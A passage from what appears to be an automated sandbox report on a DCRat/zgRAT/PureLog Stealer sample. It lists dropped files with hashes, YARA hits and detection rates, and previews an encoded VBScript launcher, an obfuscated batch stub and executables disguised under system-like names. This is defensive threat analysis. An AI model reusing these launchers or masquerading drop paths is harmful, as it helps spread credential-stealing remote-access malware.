                                                                            r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    6G8OR42xrB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                          Created / dropped Files

                                                                                          C:\ChainbrowserNet\2c5f0481d27cdf

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):182
                                                                                          Entropy (8bit):5.6708538473130545
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:p1UgdQh0mbEn+B/lXVQbZSKcvne0FfvLtihdREHWTMqPnDRNEh7Ou2Oiul:wgd00K/ySKcvPBWEHVqPncTNl
                                                                                          MD5:48EC5844D800C9FB05019CA09007888A
                                                                                          SHA1:DDD51A293F83B2E716DD29B362D9DCDB8A6E2C39
                                                                                          SHA-256:33CECCF70149959BAB039BBB70B75F28D5A11E5F6944E465F79CDA30DE18AF35
                                                                                          SHA-512:3EA7773D197B4D789643DF7DE737110B1CB0C9307A61EBF3A2CED9190F675FB8F2B62A36AB990740D14662E20AA832B60DE2673217D248D5C436C93D21C22AB2
                                                                                          Malicious:false
                                                                                          Preview:3psVPqmVZP85DQNkXdyztaaxJ84uaeiu97DhSpfyjZaRKFrH7vhkwFbcP4LQv154rO5FNpRr79QU9JnEQwxo6784gkSXdPCrefj6Jm4Rd0mwyGcFRH99DQ8tQBimX4Ns6i0ejq4o2fKFULFaHMGWPDoNh0qHDR4jm4zQP8gkMVGhF2ZE6IfKy1

                                                                                          C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):84
                                                                                          Entropy (8bit):5.065127619738712
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ykc1AaN2OqtVNCC1CGR6E9SWAX3HcXfgpF:ymOXMC/1DHcPgpF
                                                                                          MD5:378C4B8E3E02C987C26DF82F60ACDCA0
                                                                                          SHA1:4DF26C2812C895FF8238DCE01E66906B3A8C106E
                                                                                          SHA-256:4CC8662DD73C99D9420D6CF65290DA7643B10109157B7660E211EFEED9D78E62
                                                                                          SHA-512:2474E31638EE52759F8AD2BFE558714B65A123DA4CFD9E1B329CA984D1328A890B2E46F9B2C300C1E01FAAD1000E6B1B0A2982CC4879FB5D2986250A20802763
                                                                                          Malicious:false
                                                                                          Preview:%rDWobLeput%%jDUOMKkPwSGHOkC%..%EpOSggWCZp%"C:\ChainbrowserNet/serverDll.exe"%LeCjI%

                                                                                          C:\ChainbrowserNet\backgroundTaskHost.exe

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.ug.................t8...........8.. ....8...@.. ........................8...........@.................................P.8.K.....8. .....................8...................................................... ............... ..H............text....r8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B..................8.....H...........................-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....8....*....0.......... ........8........E............;...`...t...8....~....(Q... .... .... ....s....~....(U....... ....8.......... ....~....{~...:....& ....8....~....:V... ....8s.......~....(Y...~....(]... ....?*... ....~....{....:=...& ....82...r...ps....z*..(....*

                                                                                          C:\ChainbrowserNet\eddb19405b7ce1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (320), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):320
                                                                                          Entropy (8bit):5.797289412445972
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:z3UOD3zeliszpvqSXmgAWAyctAe2WBASuDaJOrF0SE6gVhj1ew7iRysGVnu0IdVJ:DjzcpvV2lYW7aaqub6QhJF7ioNVEdS1U
                                                                                          MD5:5912D7154D2B927BA237596735495ED4
                                                                                          SHA1:E50FCF4D600B4F04AFAFBB78ABD9CE5ED8300CAE
                                                                                          SHA-256:2B0DD6E234888B977AEF8E35CF81753F099E3A55A12FA1479BF7BDF04C2BE245
                                                                                          SHA-512:07D2F6E3E9370A43CA6AAE2D996426FD20646788C231AE4B457CB37FF23BAD61EE1554E3F4896F86B11922AC3BA83D8E798258E9919EADB8E1A106C90B328B3F
                                                                                          Malicious:false
                                                                                          Preview:0kgAgmpSRRUbasfIKS2QSOVszNma5Y5z6kne0v6usJvN1BWNMLUuoIAmPxKSAPX2Vee0EASZWIiIdH1x1YOuEKKyjBPCknucw22WhfJL25Ygj2JI6WblAmyKUpRCvQytXFVkPePVPC2JwoOq2GFNLIbKErC2NHalGpIdgi2cGFW8uoYqalJoKlhPoLfibXIHlQDGfvKTNmGFwdZZSWbm7waeH3zUDUBt7OXelRKpazaifccKwGPF5fKzzi9l5zQ2lXHhG4xALwLHV29paoi7F5xbEhpDSjtljh6IU5E1SO3JUCd6jTLQQTxpjpdiPusm

                                                                                          C:\ChainbrowserNet\serverDll.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\serverDll.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.ug.................t8...........8.. ....8...@.. ........................8...........@.................................P.8.K.....8. .....................8...................................................... ............... ..H............text....r8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B..................8.....H...........................-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....8....*....0.......... ........8........E............;...`...t...8....~....(Q... .... .... ....s....~....(U....... ....8.......... ....~....{~...:....& ....8....~....:V... ....8s.......~....(Y...~....(]... ....?*... ....~....{....:=...& ....82...r...ps....z*..(....*

                                                                                          C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\HMhdtzxEHf.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):220
                                                                                          Entropy (8bit):5.79407042376443
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Gh0wqK+NkLzWbH9WF08nZNDd3RL1wQJRifqRYFxOD7s:GhFMCzWL74d3XBJUqRYSD7s
                                                                                          MD5:ACEC86DE9EE42984E4115B8178F86968
                                                                                          SHA1:8E885B0A0E4569924E902630AFF64A26C2D45D3B
                                                                                          SHA-256:C0BC9DC1AE97215FB3E4259D7B445E685AFE25D7911B66FF382E46AE523B9340
                                                                                          SHA-512:0C4C8EAE4F2A8A8EC9BA76F4B53A35CE29F290D637E58B3C551782064BECCB6C793E31FB6DEEA9D734DA0A254F2865BF460FA7F3D0F0FB4F50A59B17948B74FE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Preview:#@~^wwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZ4mk.4DKhknDg+OzJsdUS:v2eoUm*UHK\UG2VPmJtZ04R(CYr~~TBP0Csk+4z0AAA==^#~@.

                                                                                          C:\Program Files (x86)\Windows Portable Devices\793256d396e5cd

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (390), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):390
                                                                                          Entropy (8bit):5.864368485378418
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:oQWQkn4IjgRYqdpML7dnOKZj/527XaDFb0wtzP0Wsk2rCWmTzt/hgtnlr66hn:oUknSRYjL7dnUXaDFb0WzMTpr9kWJ
                                                                                          MD5:2CA3638B6B50DE3B74A3B352495FF3C2
                                                                                          SHA1:1B3716B612A4E87D67AE0E2EAE0325FC222CDC23
                                                                                          SHA-256:03A7656172B7A42AE88581403723BE4314024174010BC35ADDD051071A224102
                                                                                          SHA-512:181A819514A6BC3C172D87D8F483A8F03155DF0526D0B952DF3AAA8FF05D57D5197AFE469BA5839CCE62E6497CE7E935670212BC216AC3D4BA7F3BCEC675006C
                                                                                          Malicious:false
                                                                                          Preview:O653PN5J6jh5NGyXI4WQjEZQGjaLay14Pe4LXazBgMbWEgDAcUVtg0yKgoxqxusIrmqtLnArEVtXmCMjgatFdIYYptosmJOwdSpb0TyyUnoLGbhecOKXAmpiORDb8RE4H74TWutMl4vzdNSOMJQY90v0nHMiPW0CiuDIhNHrf7vF1zEB9zPzBq5QMDqPhK7OEtRtJKr8Cj2CEp9xDLjaGAB2yx6dh2JUAhBIiU2yHRwbx3LgE2LWlgHDrY5VNOaKZhCho0PsTuTzOjE5maYoqxtdZ7aJZgk30mCP1n1NndC0NSzIU9txzwelyiHqaFTwJa8mhyE8iLBMv3QHISzZxxDEHbbSgLxiKQqxUMlf5uPovR05SAiHP38WW3eFWvcXXcCfMc

                                                                                          C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.ug.................t8...........8.. ....8...@.. ........................8...........@.................................P.8.K.....8. .....................8...................................................... ............... ..H............text....r8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B..................8.....H...........................-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....8....*....0.......... ........8........E............;...`...t...8....~....(Q... .... .... ....s....~....(U....... ....8.......... ....~....{~...:....& ....8....~....:V... ....8s.......~....(Y...~....(]... ....?*... ....~....{....:=...& ....82...r...ps....z*..(....*

                                                                                          C:\Recovery\1a5d5b8dcee3d8

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (859), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):859
                                                                                          Entropy (8bit):5.91486477446124
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:SBx968ea3Tmidt42iI7Q6wz4IXlFFIOUqO0h:SH96/ajmidi2iI2z4IX7FTUT0h
                                                                                          MD5:38E68926D22458E2AA9D37E72CFD3877
                                                                                          SHA1:2E2A595B17A0FD5EEF206941BFBF77FEF6DADE58
                                                                                          SHA-256:B8D29FF4F06BED1CF76D62FB4C7E8D0AF0CA6DAD31E270F980C34560967AF846
                                                                                          SHA-512:27CD7BB5DAD83710FD3ED1E0FF89851E730901F2E064FB13E7E0A55689D1A73ABAB8DEA9071AD73F1D2AEEF95BEB979BF34592037B027F2EEAB4E28D8CA18CDA
                                                                                          Malicious:false
                                                                                          Preview:Vfkro0BnHCEsd9XdVPtQiobglhgRGudpAr8pqjo7n5ibdhQsOjOTEqSqDEFHTugXiZsvBsxvkwmmGACEQyDhfKlTZRlldhn3ZL2EyerfwdsRDqkDCB0fr91YyYWuGLRDJsN5I7PvGhvCbTQtqijcqHMZTeQaI7ZkLoIUcp5EwEYJOz6eInDilzWBgxlnrynJHK0xL5QAnfpltCLehvRe319WRHyoERX7aPBD8JTNWD4GJuSelHG5gJQQLdfDHl6WIsLdAIfYcEH062NhzUC6LbaR9v2eoPFvGi7ajyddlrccBZUSQ7Oxi9LqR3ePQAuM9WtY4w7A0jVd88QjajOqASMHXRJqTONk7Pcpq6YdAN69nrsSn4yqwDMqJmBnnRrlVvfsfk3eLvpwVMdpj0CYZgy4DwfE5uztgUo2M9xCBTfAXZU7IVExOSMy6lptFzja66PAikcjD9XGAxgobi5jqBfOIz6kUD7MuFEbJUYi2euO4FyJFBSg3At4aB1to2P9CLV5tEeHJXqLRRUCAxeTvaSuVKBIco4APuLtu2aBgKWgThmJrzs1X6Ol2ljiCWofdp6gFkSIXdwkDvaxh1bn6CmSgk0IT18Kg1DnkFEGgke4JniHLvBL4BiaCnAftJygemEMrwMbwUGVisJ3Bt7hzxPeSnl7FjXWv8ZhiWZYijYk4N1UeGdALQqrWk3ELPVN7tjkTlUpUj9PYojFwQc8GXLfRsK8cVNSNLnLnRB2wxpmRaSrAxS4xXHkiESkbVN9WqBNBYcePjMTriN0Zd8pDSf0DDmi8abakqQkZFpmUxoNKy290cL7Xh6DLKJ8v3gzIvsBSnbUxWUPoRpPKmsgPdDCuMZ

                                                                                          C:\Recovery\Memory Compression.exe

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.ug.................t8...........8.. ....8...@.. ........................8...........@.................................P.8.K.....8. .....................8...................................................... ............... ..H............text....r8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B..................8.....H...........................-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....8....*....0.......... ........8........E............;...`...t...8....~....(Q... .... .... ....s....~....(U....... ....8.......... ....~....{~...:....& ....8....~....:V... ....8s.......~....(Y...~....(]... ....?*... ....~....{....:=...& ....82...r...ps....z*..(....*

                                                                                          C:\Users\Default\Videos\27d1bcfc3c54e0

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):425
                                                                                          Entropy (8bit):5.823068388891013
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:MoUi8a6j2ziWsxSGauR11t4flh4cSsZI+spp9nNbCLGMO:MnyGUsAlHwp9NbCLg
                                                                                          MD5:F13C6F7C6F85B5FA6EEE6574A35DAA41
                                                                                          SHA1:8CF9B489C25C785EBF2D1708D9A433B820DE220F
                                                                                          SHA-256:EAB3961C26091BDD067DC96507473FB22DF3EB2497A3542D47A4800008C85310
                                                                                          SHA-512:31CD532CEBF9E267446319463DE5AC587FC9C3443CD6A00AE368D5BE1AFBDD60F827DFBB5F36A9591DFDE2D78BD252A589177BC91846C2381354CBCA10C392B9
                                                                                          Malicious:false
                                                                                          Preview:1pbG9eo4nl9HRt9PeqQ015oeUvcamreGv5cuNuWbwBC3kmtXAcHzrqi6B6vNCOS5G3VVRPCtUzE02u4rBFaJjoYEXgsR8IYisGxrQYFvaYf2mrDRBDM6xJVbeR7uguvLagHw6Nbm9psLJgcqdbP46buivVM9bVOqmUbFjRUymj7HbJS7yRREf0P8viAlAbLobCiyFXGLHaRXenHlDPLJDKKwEcUAQtxLXTqZkd2bLF7Ei2eIbZhvPCkQ1wumCF5YnG9K6sAjWu87MGNM8Mj0LC5VtZhytQYFKibc2ULsZ8YfDnDviho0fENkKobhKLzGV2xoovUnB0bMnaRFVwPMlhjFV0SN2nhNISJL0ZGxMAzomA7tXVLY5neySrSycGvXTOEVQGP5pcAls5cV3i0hbJRfxV2JHSUFPcVY5mcRG

                                                                                          C:\Users\Default\Videos\System.exe

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.ug.................t8...........8.. ....8...@.. ........................8...........@.................................P.8.K.....8. .....................8...................................................... ............... ..H............text....r8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B..................8.....H...........................-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....8....*....0.......... ........8........E............;...`...t...8....~....(Q... .... .... ....s....~....(U....... ....8.......... ....~....{~...:....& ....8....~....:V... ....8s.......~....(Y...~....(]... ....?*... ....~....{....:=...& ....82...r...ps....z*..(....*

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Memory Compression.exe.log

                                                                                          Download File
                                                                                          Process:C:\Recovery\Memory Compression.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):847
                                                                                          Entropy (8bit):5.354334472896228
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\Default\Videos\System.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):847
                                                                                          Entropy (8bit):5.354334472896228
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aaHgUfBgYBljMPbLmzgS.exe.log

                                                                                          Download File
                                                                                          Process:C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):847
                                                                                          Entropy (8bit):5.354334472896228
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\serverDll.exe.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
